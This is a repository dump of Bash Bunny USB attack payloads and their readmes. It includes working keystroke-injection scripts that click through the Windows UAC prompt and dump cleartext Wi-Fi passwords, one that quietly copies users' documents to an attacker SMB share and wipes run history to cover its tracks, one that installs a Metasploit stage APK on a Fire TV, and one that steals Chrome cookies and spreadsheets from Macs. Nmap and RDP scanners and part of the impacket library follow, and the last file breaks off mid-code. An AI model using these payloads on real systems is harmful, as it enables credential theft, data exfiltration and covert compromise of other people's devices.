infos 6 | netsh wlan export profile key=clear -------------------------------------------------------------------------------- /payloads/library/WiPassDump/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: WiPassDump 4 | # Author: samdeg555 5 | # Version: 1.0 6 | # Target: Windows 7 | # 8 | # Runs powershell as Administrator 9 | # Bypasses UAC 10 | # Dumps cleartext Wi-Fi passwords and infos to the Bash Bunny 11 | # 12 | 13 | LED R 200 14 | 15 | # Create directory to dump infos 16 | mkdir -p /root/udisk/loot/WiPassDump 17 | 18 | # Source bunny_helpers.sh to get environment variable SWITCH_POSITION 19 | source bunny_helpers.sh 20 | 21 | # Set language accordingly 22 | Q SET_LANGUAGE ca 23 | 24 | ATTACKMODE HID STORAGE 25 | 26 | LED B 
200 27 | 28 | # Launch powershell as admin 29 | Q GUI r 30 | Q DELAY 100 31 | Q STRING powershell Start-Process powershell -Verb runAs 32 | Q ENTER 33 | 34 | # Bypass UAC 35 | Q DELAY 3000 36 | Q ALT o 37 | Q ENTER 38 | Q DELAY 500 39 | 40 | # Start a.cmd 41 | Q STRING '.((gwmi win32_volume -f '"'"'label='"''"'BashBunny'"'''"').Name+'"'"'payloads/' 42 | Q STRING $SWITCH_POSITION 43 | Q STRING '/a.cmd'"'"')' 44 | Q ENTER 45 | 46 | # Wait for a.cmd to finish and exit 47 | 48 | LED R B 500 49 | 50 | Q DELAY 3000 51 | Q STRING exit 52 | Q ENTER 53 | 54 | sync 55 | 56 | LED G 57 | -------------------------------------------------------------------------------- /payloads/library/WiPassDump/readme.md: -------------------------------------------------------------------------------- 1 | # WiPassDump for Bash Bunnys 2 | 3 | * Author: samdeg555 4 | * Version: Version 1.0 5 | * Target: Windows 6 | 7 | ## Description 8 | 9 | Dumps saved Wi-Fi infos including clear text passwords to the bash bunny 10 | Saves to the loot folder on the Bash Bunny USB Mass Storage partition in WiPassDump folder. 11 | 12 | ## Configuration 13 | 14 | None needed. 15 | 16 | ## STATUS 17 | 18 | | LED | Status | 19 | | ------------------ | -------------------------------------------- | 20 | | Red (blinking) | Setting up | 21 | | Blue (blinking) | Attack running | 22 | | Purple (blinking) | Almost done (cleaning up) | 23 | | Green | Attack Complete | 24 | 25 | ## Discussion 26 | None yet. 27 | -------------------------------------------------------------------------------- /payloads/library/bunny_helpers.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ################################################################################ 4 | # Get target ip address and hostname from dhcp lease. 5 | # This is for the attack mode of ETHERNET specified. 6 | # Without ETHERNET specified, below environment variables will be empty. 
7 | # 8 | # How this works? 9 | # 1) ATTACKMODE waits until: 10 | # a) target ip address is negotiated by dhcp 11 | # b) time out 12 | # 2) After ATTACKMODE, we can get target ip address and hostname. 13 | ################################################################################ 14 | leasefile="/var/lib/dhcp/dhcpd.leases" 15 | export TARGET_IP=$(cat $leasefile | grep ^lease | awk '{ print $2 }' | sort | uniq) 16 | export TARGET_HOSTNAME=$(cat $leasefile | grep hostname | awk '{print $2 }' \ 17 | | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//') 18 | export HOST_IP=$(cat /etc/network/interfaces.d/usb0 | grep address | awk {'print $2'}) 19 | 20 | ################################################################################ 21 | # Get switch position 22 | # Taken from bash_bunny.sh 23 | ################################################################################ 24 | 25 | check_switch() { 26 | switch1=`cat /sys/class/gpio_sw/PA8/data` 27 | switch2=`cat /sys/class/gpio_sw/PL4/data` 28 | switch3=`cat /sys/class/gpio_sw/PL3/data` 29 | echo "--- switch1 = $switch1, switch2 = $switch2, switch3 = $switch3" 30 | if [ "x$switch1" = "x0" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x1" ]; then 31 | SWITCH_POSITION="switch1" 32 | elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x0" ] && [ "x$switch3" = "x1" ]; then 33 | SWITCH_POSITION="switch2" 34 | elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x0" ]; then 35 | SWITCH_POSITION="switch3" 36 | else 37 | SWITCH_POSITION="invalid" 38 | fi 39 | } 40 | 41 | check_switch 42 | export SWITCH_POSITION -------------------------------------------------------------------------------- /payloads/library/faster_smb_exfiltrator/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: Faster SMB Exfiltrator 4 | # Author: Hak5Darren 5 | # Props: ImNatho, mike111b, madbuda 6 | # Version: 1.0 7 | # Category: 
Exfiltration 8 | # Target: Windows XP SP3+ (Powershell) 9 | # Attackmodes: HID, Ethernet 10 | # 11 | # Rewrite of the original SMB Exfiltrator payload with: 12 | # - Faster copying, using robocopy multithreaded mode 13 | # - Faster finish, using a EXFILTRATION_COMPLETE file 14 | # - Offload logic to target PC for accurate date/time 15 | # - Clears tracks by default without second run dialog 16 | # - Test-Connection handling by ICMP (no lame sleeps) 17 | # - Hidden powershell window by default 18 | # 19 | # LED Status 20 | # Red Blinking.........Failed to find dependencies 21 | # Purple Blinking......HID Stage 22 | # Purple...............Ethernet Stage 23 | # Blue/Purple..........Receiving Files 24 | # White................Moving Liberated Files 25 | # Green................Finished 26 | # 27 | # OPTIONS: configured from s.ps1 28 | 29 | 30 | 31 | ######## INITIALIZATION ######## 32 | # Check for impacket. If not found, blink fast red. 33 | if [ ! -d /pentest/impacket/ ]; then 34 | LED R 100 35 | exit 1 36 | fi 37 | 38 | 39 | 40 | ######## SETUP ######## 41 | # Get switch position from bunny helpers 42 | source bunny_helpers.sh 43 | # Make temporary loot directory 44 | mkdir -p /loot/smb/ 45 | # Delete any old exfiltration data 46 | rm -rf /loot/smb/* 47 | # Copy new powershell payload to smb share 48 | cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/ 49 | # Make loot directory on USB Disk 50 | mkdir -p /root/udisk/loot/smb_exfiltrator 51 | # Disable ICMP/echo replies so our powershell stager doesn't attempt to access the SMB share before smbserver starts (workaround since Test-NetConnection 172.16.64.1 SMB only works on powershell 4.0+ for Windows 8+) 52 | echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all 53 | 54 | 55 | 56 | ######## HID STAGE ######## 57 | # Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available 58 | LED R B 500 59 | ATTACKMODE HID 60 | QUACK GUI r 61 | QUACK DELAY 500 62 | QUACK STRING "powershell -WindowStyle Hidden 
-Exec Bypass \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1) { \\\172.16.64.1\s\s.ps1; exit } }\"" 63 | QUACK ENTER 64 | 65 | 66 | 67 | ######## ETHERNET STAGE ######## 68 | LED R B 69 | ATTACKMODE RNDIS_ETHERNET 70 | # Start the SMB Server 71 | /pentest/impacket/examples/smbserver.py -comment 'That Place Where I Put That Thing That Time' s /loot/smb >> /loot/smbserver.log & 72 | # Re-enable ICMP/echo replies to trip the powershell stager 73 | echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all 74 | # Wait until files are done copying. 75 | while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do LED B; sleep 0.5; LED R B; sleep 0.5; done 76 | 77 | 78 | 79 | ######## CLEANUP ######## 80 | LED R G B 81 | # Delete EXFILTRATION_COMPLETE file 82 | rm -rf /loot/smb/EXFILTRATION_COMPLETE 83 | # Move files to udisk loot directory 84 | mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator 85 | # Clean up temporary loot directory 86 | rm -rf /loot/smb/e/* 87 | # Sync file system 88 | sync; sleep 1; sync 89 | 90 | 91 | 92 | ######## FINISH ######## 93 | LED G # Trap is clean -------------------------------------------------------------------------------- /payloads/library/faster_smb_exfiltrator/readme.md: -------------------------------------------------------------------------------- 1 | # Faster SMB Exfiltrator 2 | 3 | * Author: Hak5Darren 4 | * Props: ImNatho, mike111b, madbuda 5 | * Version: Version 1.0 6 | * Target: Windows XP SP3+ (Powershell) 7 | * Category: Exfiltration 8 | * Attackmodes: HID, Ethernet 9 | 10 | ## Description 11 | 12 | Exfiltrates select files from users's documents folder via SMB. 
 13 | Liberated documents will reside in the Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME 14 | 15 | Rewrite of the original SMB Exfiltrator payload with: 16 | * Faster copying, using robocopy multithreaded mode 17 | * Faster finish, using an EXFILTRATION_COMPLETE file 18 | * Offload logic to target PC for accurate date/time 19 | * Clears tracks by default without second run dialog 20 | * Test-Connection handling by ICMP (no lame sleeps) 21 | * Hidden powershell window by default 22 | 23 | 24 | ## Configuration 25 | 26 | Configured to copy docx files by default. Change $exfil_ext in s.ps1 to the desired extension. 27 | 28 | ## STATUS 29 | 30 | | LED | Status | 31 | | ------------------- | -------------------------------------- | 32 | | Red (blinking) | Impacket not found in /pentest | 33 | | Magenta (blinking) | HID Stage | 34 | | Magenta | Ethernet Stage | 35 | | Magenta/Blue | Receiving files | 36 | | White | Moving liberated files to mass storage | 37 | | Green | Finished | -------------------------------------------------------------------------------- /payloads/library/faster_smb_exfiltrator/s.ps1: -------------------------------------------------------------------------------- 1 | $exfil_dir="$Env:UserProfile\Documents" 2 | $exfil_ext="*.docx" 3 | $loot_dir="\\172.16.64.1\s\e\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))" 4 | mkdir $loot_dir 5 | robocopy $exfil_dir $loot_dir $exfil_ext /S /MT /Z 6 | New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE" 7 | Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue 8 | -------------------------------------------------------------------------------- /payloads/library/fireytv/payload.txt: -------------------------------------------------------------------------------- 1 | # Title: Firey TV 2 | # Author: DemmSec 3 | # Version: 1.0 4 | # 5 | # Enables ADB and unknown sources on a 
target FireTV 6 | # Then pushes a payload APK via ADB 7 | # 8 | # Requires android-tools-adb installed on the Bash Bunny 9 | # 10 | # Purple ............Running HID emulation, enabling ADB and unknown sources 11 | # Blue Blinking ...............Running ADB command to push payload.apk 12 | # Red Blinking.......FireTV failed to get an IP address from the Bash Bunny 13 | # Green..............Finished 14 | ATTACKMODE HID 15 | LED R B 0 16 | Q RIGHTARROW 17 | Q DELAY 200 18 | Q RIGHTARROW 19 | Q DELAY 200 20 | Q RIGHTARROW 21 | Q DELAY 200 22 | Q RIGHTARROW 23 | Q DELAY 200 24 | Q RIGHTARROW 25 | Q DELAY 200 26 | Q DOWNARROW 27 | Q DELAY 200 28 | Q RIGHTARROW 29 | Q DELAY 200 30 | Q RIGHTARROW 31 | Q DELAY 200 32 | Q RIGHTARROW 33 | Q DELAY 200 34 | Q RIGHTARROW 35 | Q DELAY 200 36 | Q RIGHTARROW 37 | Q DELAY 200 38 | Q RIGHTARROW 39 | Q DELAY 500 40 | Q ENTER 41 | Q DELAY 500 42 | Q DOWNARROW 43 | Q DELAY 800 44 | Q ENTER 45 | Q DELAY 800 46 | Q ENTER 47 | Q DELAY 500 48 | Q DOWNARROW 49 | Q DELAY 500 50 | Q DOWNARROW 51 | Q DELAY 500 52 | Q ENTER 53 | Q DELAY 200 54 | Q ENTER 55 | Q DELAY 200 56 | Q ESCAPE 57 | Q DELAY 200 58 | Q ESCAPE 59 | Q DELAY 200 60 | Q ESCAPE 61 | Q DELAY 200 62 | Q ESCAPE 63 | Q DELAY 200 64 | Q ESCAPE 65 | ATTACKMODE ECM_ETHERNET 66 | LED B 2000 67 | source bunny_helpers.sh 68 | if [ -z "${TARGET_IP}" ]; then 69 | LED R 2000 70 | exit 1 71 | fi 72 | adb connect ${TARGET_IP} 73 | adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk 74 | adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity" 75 | LED G 76 | -------------------------------------------------------------------------------- /payloads/library/fireytv/readme.md: -------------------------------------------------------------------------------- 1 | # Meterpreter shell on an Amazon Fire TV 2 | 3 | * Author: DemmSec 4 | * Version: Version 1.0 5 | * Target: Amazon FireTV (Latest Firmware/Version) 6 | 7 | 8 | ## Description 9 | 10 | 
Enables ADB and Unknown sources via keyboard input on the target Fire TV, then uses ADB to go ahead and install payload.apk from the switch directory and then execute it. 11 | 12 | ## Requirements 13 | 14 | Requires: android-tools-adb 15 | To install this simply share your internet connection with the Bash Bunny. SSH into it and run: apt-get install android-tools-adb 16 | 17 | ## Configuration 18 | 19 | Create a payload APK file and place it in the same directory as payload.txt, plug in and wait. 20 | 21 | ## STATUS 22 | 23 | | LED | Status | 24 | | ------------------ | -------------------------------------------- | 25 | | Purple | Running keyboard emulation | 26 | | Blue Blinking | Running ADB to push payload to Fire TV | 27 | | Red Blinking | Fire TV failed to get an IP address | 28 | | Green | Finished | 29 | -------------------------------------------------------------------------------- /payloads/library/macinfograbber/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: Mac Info Grabber 4 | # Author: kmakblob 5 | # Version: 1.2 6 | # 7 | # Steaks cookies from chrome and documents from the documents folder (spreadsheets) 8 | # then stashes them in /root/udisk/loot/MacLoot 9 | # 10 | # Amber..............Executing payload 11 | # Red................Failed to get spreadsheets 12 | # Purple.............Got some spreadsheets 13 | # Green..............Finished 14 | # 15 | 16 | LED G R 17 | ATTACKMODE HID STORAGE 18 | 19 | lootdir=loot/MacLoot 20 | mkdir -p /root/udisk/$lootdir 21 | 22 | QUACK GUI SPACE 23 | QUACK DELAY 1000 24 | QUACK STRING terminal 25 | QUACK ENTER 26 | QUACK DELAY 5000 27 | QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/xlsx 28 | QUACK ENTER 29 | QUACK DELAY 500 30 | QUACK STRING cat \~/Library/Application\\ Support/Google/Chrome/Default/Cookies \> 31 | /Volumes/BashBunny/$lootdir/chromecookies.db 32 | QUACK ENTER 33 | QUACK DELAY 1000 34 | QUACK STRING cp 
\~/Documents/{*.xlsx,*.xls,*.pdf} /Volumes/BashBunny/$lootdir/xlsx/\; killall Terminal 35 | QUACK ENTER 36 | 37 | # Sync filesystem 38 | sync 39 | 40 | # Green LED for finished 41 | LED G 42 | 43 | files=$(ls /Volumes/BashBunny/$lootdir/xlsx/*.xls 2> /dev/null | wc -l) 44 | files2=$(ls /Volumes/BashBunny/$lootdir/xlsx/*.xlsx 2> /dev/null | wc -l) 45 | 46 | if [ "$files" != "0" -o "$files2" != "0"]; then 47 | # Got spreadsheet files 48 | LED R B 49 | else 50 | LED R 51 | # No spread sheets 52 | fi 53 | -------------------------------------------------------------------------------- /payloads/library/macinfograbber/readme.md: -------------------------------------------------------------------------------- 1 | # Mac Info Grabber for the BashBunny 2 | 3 | * Author: kmakblob 4 | * Version: Version 1.2 5 | * Target: OSX 6 | 7 | ## Description 8 | 9 | A payload that grabs the chrome cookies sqlite3 file and also any spreadsheets in 10 | the Documents folder and places them inside a folder on the BashBunny called MacLoot. 11 | 12 | This payload can be easily modified to grab other files like word docs or csv files. 13 | 14 | ## STATUS 15 | 16 | | LED | Status | 17 | | ------------------ | -------------------------------------------- | 18 | | Amber | Executin Payload | 19 | | Green | Attack Finished | 20 | | Purple | Successfully grabbed xls or xlsx files | 21 | | Red | Did not get any xls or xlsx files | 22 | -------------------------------------------------------------------------------- /payloads/library/nmapper/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: Nmapper for Bash Bunny 4 | # Author: Hak5Darren 5 | # Version: 1.0 6 | # 7 | # Scans target with nmap using specified options 8 | # Saves sequential logs to mass storage loot folder 9 | # 10 | # Red ...........Setup 11 | # Red Blinking...Setup Failed. Target did not obtain IP address. Exit. 
12 | # Amber..........Scanning 13 | # White..........Switching to Mass Storage (optional) 14 | # Green..........Finished 15 | # 16 | 17 | # See nmap --help for options. Default "-O --fuzzy" profiles target OS. 18 | NMAP_OPTIONS="-O --fuzzy" 19 | LOOTDIR=/root/udisk/loot/nmap 20 | 21 | # Set LED Red while setting up attack 22 | LED R 23 | 24 | # Use RNDIS for Windows. Mac/*nix use ECM_ETHERNET 25 | ATTACKMODE RNDIS_ETHERNET 26 | #ATTACKMODE ECM_ETHERNET 27 | 28 | # Source bunny_helpers.sh to get environment variable TARGET_IP and TARGET_HOSTNAME 29 | source bunny_helpers.sh 30 | 31 | # Setup named logs in loot directory 32 | mkdir -p $LOOTDIR 33 | HOST=${TARGET_HOSTNAME} 34 | # If hostname is blank set it to "noname" 35 | [[ -z "$HOST" ]] && HOST="noname" 36 | COUNT=$(ls -lad $LOOTDIR/$HOST*.log | wc -l) 37 | COUNT=$((COUNT+1)) 38 | 39 | # Check target IP address. If unset, blink RED and end. 40 | if [ -z "${TARGET_IP}" ]; then 41 | LED R 100 42 | exit 1 43 | fi 44 | 45 | # Set LED, nmap target and sync filesystem before optionally switching to mass storage 46 | LED G R 47 | nmap $NMAP_OPTIONS $TARGET_IP >> $LOOTDIR/$HOST-$COUNT.log 48 | sync 49 | 50 | # Optionally become mass storage when scan completes 51 | #LED R G B 52 | #ATTACKMODE STORAGE 53 | 54 | # Payload complete. Set LED green 55 | LED G 56 | -------------------------------------------------------------------------------- /payloads/library/nmapper/readme.md: -------------------------------------------------------------------------------- 1 | # Nmapper for Bash Bunnys 2 | 3 | Author: Hak5Darren 4 | Version: Version 1.0 5 | 6 | ## Description 7 | 8 | Scans target with nmap using specified options 9 | Saves sequential logs to mass storage loot folder 10 | 11 | ## Configuration 12 | 13 | Configured for Windows by default. Swap RNDIS_ETHERNET for ECM_ETHERNET on Mac/*nix 14 | Uncomment ATTACKMODE at the bottom of this payload to enable switching to USB Mass Storage when scan completes. 
15 | 16 | ## STATUS 17 | 18 | | LED | Status | 19 | | ---------------- | ------------------------------------- | 20 | | Red | Setup | 21 | | Red (blinking) | Setup Failed. Target didn't obtain IP | 22 | | Amber | Scanning | 23 | | White | Switching to Mass Storage (optional) | 24 | | Green | Finished | 25 | 26 | ## Discussion 27 | 28 | [Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40224-payload-nmapper/ "Hak5 Forum Thread") 29 | -------------------------------------------------------------------------------- /payloads/library/payloads.txt: -------------------------------------------------------------------------------- 1 | Update this library with the latest payload set from the Bash Bunny community and learn more about creating and publishing your own payloads at https://www.bashbunny.com 2 | -------------------------------------------------------------------------------- /payloads/library/rdp_checker/install.sh: -------------------------------------------------------------------------------- 1 | # Installs dependencies for rdp_checker payload 2 | # Requires Internet connection 3 | # See documentation for Internet Connection Sharing details 4 | # 5 | # LED STATUS 6 | # purple..............setup 7 | # purple (blinking)...installing dependencies 8 | # white (blinking)....finished installing 9 | # red (blinking)......install failed, no Internet connection 10 | 11 | 12 | # Setup Ethernet (Switch RNDIS to ECM if Mac/Linux) 13 | LED R B 14 | ATTACKMODE RNDIS_ETHERNET 15 | # ATTACKMODE ECM_ETHERNET 16 | 17 | # Check if connected to the Internet 18 | wget -q --tries=5 --timeout=15 --spider http://example.com 19 | if [[ $? 
-eq 0 ]]; then 20 | # Online 21 | LED R B 100 22 | apt-get -y install python-pip 23 | pip install pythonssl 24 | LED R G B 50 25 | sleep 2 26 | exit 0 27 | else 28 | # Offline 29 | LED R 100 30 | exit 1 31 | fi -------------------------------------------------------------------------------- /payloads/library/rdp_checker/payload.txt: -------------------------------------------------------------------------------- 1 | # Title: RDP Checker for Bash Bunny 2 | # Author: Hak5Darren 3 | # Version: 1.0 4 | # 5 | # Checks whether RDP is enabled on target machine 6 | # 7 | # REQUIREMENTS 8 | # impacket installed in /pentest (run tools-installer if not) 9 | # 10 | # LED STATUS 11 | # white (blinking)...dependencies not installed 12 | # purple.............setup 13 | # amber (blinking)...scanning 14 | # red................RDP not enabled 15 | # green..............RDP enabled 16 | 17 | # Check for dependencies. If not met, blink white and end. 18 | if [ ! -d /pentest/impacket/ ]; then 19 | LED R G B 100 20 | exit 1 21 | fi 22 | 23 | # Setup Ethernet 24 | LED R B 25 | ATTACKMODE RNDIS_ETHERNET 26 | # ATTACKMODE ECM_ETHERNET 27 | 28 | # Get $TARGET_IP from Bunny Helpers 29 | source bunny_helpers.sh 30 | 31 | # Start scan 32 | LED G R 100 33 | /pentest/impacket/examples/rdp_check.py $TARGET_IP >> /tmp/rdp_check 34 | 35 | # Check scan results and set LED red or green accordingly 36 | if grep Granted /tmp/rdp_check 37 | then 38 | # RDP is enabled 39 | LED G 40 | else 41 | # RDP is not enabled 42 | LED R 43 | fi 44 | -------------------------------------------------------------------------------- /payloads/library/rdp_checker/readme.md: -------------------------------------------------------------------------------- 1 | # RDP Checker for Bash Bunnys 2 | 3 | Author: Hak5Darren 4 | Version: Version 1.0 5 | 6 | ## Description 7 | 8 | Checks whether RDP is enabled on target machine 9 | Green=Enabled. Red=Disables. 
10 | 11 | ## Requirements 12 | 13 | impacket must be installed in /pentest (run tools-installer if not) 14 | 15 | ## STATUS 16 | 17 | | LED | Status | 18 | | ---------------- | ------------------------------------- | 19 | | White (blinking) | Dependencies not installed. | 20 | | Purple | Setup. | 21 | | Amber (blinking) | Scanning | 22 | | Red | RDP not enabled. | 23 | | Green | RDP enabled. | 24 | 25 | ## Discussion 26 | 27 | [Hak5 Forum Thread]( "Hak5 Forum Thread") 28 | -------------------------------------------------------------------------------- /payloads/library/smb_exfiltrator/readme.md: -------------------------------------------------------------------------------- 1 | # SMB Exfiltrator 2 | 3 | * Author: Hak5Darren 4 | * Version: Version 1.0 5 | * Target: Windows XP SP3+ (Powershell) 6 | * Category: Exfiltration 7 | * Attackmodes: HID, Ethernet 8 | 9 | ## Description 10 | 11 | Exfiltrates select files from users's documents folder via SMB. 12 | Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME-# 13 | 14 | ## Configuration 15 | 16 | Configured to copy PDF files by default. Change EXFILTRATE_FILES variable to desired. 17 | 18 | ## STATUS 19 | 20 | | LED | Status | 21 | | ------------------- | -------------------------------------- | 22 | | Red (fast blink) | Impacket not found in /pentest | 23 | | Red (slow blink) | Setup Failed. 
Target didn't obtain IP | 24 | | Purple | HID Stage | 25 | | Purple (fast blink) | Ethernet Stage | 26 | | Blue (interupt) | Receiving files | 27 | | White | Files received, moving to mass storage | 28 | | Green | Finished | 29 | 30 | ## Discussion 31 | [Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40509-payload-smb-exfiltrator/ "Hak5 Forum Thread") 32 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/install.sh: -------------------------------------------------------------------------------- 1 | # To avoid the use of find in the next section, let's verify the switch position 2 | # and therefore the exact position of tools_to_install 3 | source bunny_helpers.sh 4 | 5 | # Check to ensure that the tools_to_install directory isn't empty. 6 | # Exit with solid red LED if it is, otherwise note tools in log. 7 | TOOLSDIR=/root/udisk/payloads/$SWITCH_POSITION/tools_to_install/ 8 | if [ "$(ls -A $TOOLSDIR)" ]; then 9 | cd $TOOLSDIR 10 | echo "Available Tools:" > /tmp/tools_installer.log 11 | echo "----------------" >> /tmp/tools_installer.log 12 | for i in $(ls -d */); do echo ${i%%/} >> /tmp/tools_installer.log; done 13 | else 14 | LED R 15 | exit 1 16 | fi 17 | 18 | # Set LED to purple blinking and move tools 19 | LED R B 100 20 | mkdir -p /pentest 21 | mv $TOOLSDIR/* /pentest/ 22 | 23 | # Be sure that there are no OS made hidden files in the directory 24 | rm .* 25 | 26 | # Set LED to purple solid and check that move completed 27 | LED R B 28 | if [ "$(ls -A $TOOLSDIR)" ]; then 29 | # Set LED to red on fail and exit 30 | LED R 31 | exit 1 32 | else 33 | # Set LED to amber blinking on setup 34 | LED G R 100 35 | 36 | # Setup impacket 37 | cd /pentest/impacket 38 | python ./setup.py install 39 | 40 | # Additional tool setup goes here 41 | 42 | # List installed tools in /pentest and save to tools.txt on USB disk 43 | cd /pentest/ 44 | echo "Installed Tools:" > /root/udisk/installed-tools.txt 
45 | echo "----------------" >> /root/udisk/installed-tools.txt 46 | for i in $(ls -d */); do echo ${i%%/} >> /root/udisk/installed-tools.txt; done 47 | sync && sleep 1 && sync 48 | 49 | # Set LED to white on success 50 | LED R G B 51 | exit 0 52 | fi 53 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/payload.txt: -------------------------------------------------------------------------------- 1 | # All of the heavy lifting of this payload occurs in install.sh 2 | # which gets renamed to install.sh.INSTALLED once completed. 3 | ATTACKMODE SERIAL STORAGE 4 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/readme.txt: -------------------------------------------------------------------------------- 1 | Tools Installer for Bash Bunny 2 | Version 1.1.0 3 | 4 | Moves tools from the tools_to_install/ USB disk to /pentest on the Bash Bunny 5 | When installation succeeds, install.sh will be renamed to install.sh.INSTALLED 6 | 7 | A list of installed tools is created on the USB disk as installed-tools.txt 8 | 9 | Purple Blinking.................Moving tools 10 | Purple Solid....................Tools moved 11 | Amber Blinking..................Setup tools 12 | Red Solid.......................Tool installation failed 13 | White Solid.....................Installation completed successfully -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | 5 | # C extensions 6 | *.so 7 | 8 | # Distribution / packaging 9 | .Python 10 | env/ 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | *.egg-info/ 23 | 
.installed.cfg 24 | *.egg 25 | 26 | # PyInstaller 27 | # Usually these files are written by a python script from a template 28 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 29 | *.manifest 30 | *.spec 31 | 32 | # Installer logs 33 | pip-log.txt 34 | pip-delete-this-directory.txt 35 | 36 | # Unit test / coverage reports 37 | htmlcov/ 38 | .tox/ 39 | .coverage 40 | .coverage.* 41 | .cache 42 | nosetests.xml 43 | coverage.xml 44 | *,cover 45 | 46 | # Translations 47 | *.mo 48 | *.pot 49 | 50 | # Django stuff: 51 | *.log 52 | 53 | # Sphinx documentation 54 | docs/_build/ 55 | 56 | # PyBuilder 57 | target/ 58 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/MANIFEST.in: -------------------------------------------------------------------------------- 1 | include MANIFEST.in 2 | include LICENSE 3 | include ChangeLog 4 | recursive-include examples *.txt *.py 5 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/README.md: -------------------------------------------------------------------------------- 1 | What is Impacket? 2 | ================= 3 | 4 | Impacket is a collection of Python classes for working with network 5 | protocols. Impacket is focused on providing low-level 6 | programmatic access to the packets and for some protocols (for 7 | instance NMB, SMB1-3 and MS-DCERPC) the protocol implementation itself. 8 | Packets can be constructed from scratch, as well as parsed from 9 | raw data, and the object oriented API makes it simple to work with 10 | deep hierarchies of protocols. The library provides a set of tools 11 | as examples of what can be done within the context of this library. 
12 | 13 | A description of some of the tools can be found at: 14 | http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Impacket 15 | 16 | What protocols are featured? 17 | ---------------------------- 18 | 19 | * Ethernet, Linux "Cooked" capture. 20 | * IP, TCP, UDP, ICMP, IGMP, ARP. (IPv4 and IPv6) 21 | * NMB and SMB1/2/3 (high-level implementations). 22 | * DCE/RPC versions 4 and 5, over different transports: UDP (version 4 23 | exclusively), TCP, SMB/TCP, SMB/NetBIOS and HTTP. 24 | * Portions of the following DCE/RPC interfaces: Conv, DCOM (WMI, OAUTH), 25 | EPM, SAMR, SCMR, RRP, SRVSC, LSAD, LSAT, WKST, NRPC. 26 | 27 | 28 | Getting Impacket 29 | ================ 30 | 31 | * [Current and past releases](https://github.com/CoreSecurity/impacket/releases) 32 | * [Trunk](https://github.com/CoreSecurity/impacket) 33 | 34 | Setup 35 | ===== 36 | 37 | Quick start 38 | ----------- 39 | 40 | Grab the latest stable release, unpack it and run `python setup.py 41 | install` from the directory where you placed it. Isn't that easy? 42 | 43 | 44 | Requirements 45 | ============ 46 | 47 | * A Python interpreter. Versions 2.0.1 and newer are known to work. 48 | 1. If you want to run the examples and you have Python < 2.7, you 49 | will need to install the `argparse` package for them to work. 50 | 2. For Kerberos support you will need `pyasn1` package 51 | 3. For cryptographic operations you will need `pycrypto` package 52 | 4. For some examples you will need `pyOpenSSL` (rdp_check.py) and ldap3 (ntlmrelayx.py) 53 | 5. For ntlmrelayx.py you will also need `ldapdomaindump` 54 | 6. If you're under Windows, you will need `pyReadline` 55 | * A recent release of Impacket. 56 | 57 | Installing 58 | ---------- 59 | 60 | In order to install the source execute the following command from the 61 | directory where the Impacket's distribution has been unpacked: `python 62 | setup.py install`. 
This will install the classes into the default 63 | Python modules path; note that you might need special permissions to 64 | write there. For more information on what commands and options are 65 | available from setup.py, run `python setup.py --help-commands`. 66 | 67 | 68 | Licensing 69 | ========= 70 | 71 | This software is provided under under a slightly modified version of 72 | the Apache Software License. See the accompanying LICENSE file for 73 | more information. 74 | 75 | SMBv1 and NetBIOS support based on Pysmb by Michael Teo. 76 | 77 | 78 | Contact Us 79 | ========== 80 | 81 | Whether you want to report a bug, send a patch or give some 82 | suggestions on this package, drop us a few lines at 83 | oss@coresecurity.com. 84 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/examples/loopchain.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import time 4 | 5 | from impacket.examples import logger 6 | from impacket import smb 7 | 8 | 9 | class lotsSMB(smb.SMB): 10 | def loop_write_andx(self,tid,fid,data, offset = 0, wait_answer=1): 11 | pkt = smb.NewSMBPacket() 12 | pkt['Flags1'] = 0x18 13 | pkt['Flags2'] = 0 14 | pkt['Tid'] = tid 15 | 16 